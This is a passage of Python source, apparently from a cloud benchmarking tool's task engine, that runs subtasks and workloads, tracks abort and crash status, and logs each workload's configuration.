(p["platform_name"], p["platform_data"]) for p in env_data["platforms"].values()) context_obj = { "task": self.task, "owner_id": owner_id, "scenario_name": scenario_name, "config": context_config, "env": env_data } return context_obj @logging.log_task_wrapper(LOG.info, "Running task.") def run(self): """Run the benchmark according to the test configuration. Test configuration is specified on engine initialization. :returns: List of dicts, each dict containing the results of all the corresponding benchmark test launches """ self.task.update_status(consts.TaskStatus.RUNNING) try: for subtask in self.config.subtasks: self._run_subtask(subtask) except TaskAborted: LOG.info("Received aborting signal.") self.task.update_status(consts.TaskStatus.ABORTED) else: if objects.Task.get_status( self.task["uuid"]) != consts.TaskStatus.ABORTED: self.task.update_status(consts.TaskStatus.FINISHED) def _run_subtask(self, subtask): subtask_obj = self.task.add_subtask(title=subtask["title"], description=subtask["description"], contexts=subtask["contexts"]) try: # TODO(astudenov): add subtask context here for workload in subtask["workloads"]: self._run_workload(subtask_obj, workload) except TaskAborted: subtask_obj.update_status(consts.SubtaskStatus.ABORTED) raise except Exception: subtask_obj.update_status(consts.SubtaskStatus.CRASHED) # TODO(astudenov): save error to DB LOG.exception("Unexpected exception during the subtask execution") # NOTE(astudenov): crash task after exception in subtask self.task.update_status(consts.TaskStatus.CRASHED) raise else: subtask_obj.update_status(consts.SubtaskStatus.FINISHED) def _run_workload(self, subtask_obj, workload): if ResultConsumer.is_task_in_aborting_status(self.task["uuid"]): raise TaskAborted() workload_obj = subtask_obj.add_workload( name=workload["name"], description=workload["description"], position=workload["position"], runner=workload["runner"], runner_type=workload["runner_type"], hooks=workload["hooks"], contexts=workload["contexts"], sla=workload["sla"], args=workload["args"]) workload["uuid"] = workload_obj["uuid"] workload_cfg = objects.Workload.to_task(workload) LOG.info("Running workload: \n" " position = %(position)s\n" " config = %(cfg)s" % {"position": workload["position"], "cfg": json.dumps(workload_cfg, indent=3)}) runner_cls = runner.ScenarioRunner.get(workload["runner_type"]) runner_obj = runner_cls(self.task, workload["runner"]) context_obj = self._prepare_context( workload["contexts"], workload["name"], workload_obj["uuid"]) try: ctx_manager = context.ContextManager(context_obj) with ResultConsumer(workload, task=self.task, subtask=subtask_obj, workload=workload_obj, runner=runner_obj, abort_on_sla_failure=self.abort_on_sla_failure, ctx_manager=ctx_manager): with ctx_manager: runner_obj.run(workload["name"], context_obj, workload["args"]) except Exception: LOG.exception("Unexpected exception during the workload execution") # TODO(astudenov): save error to DB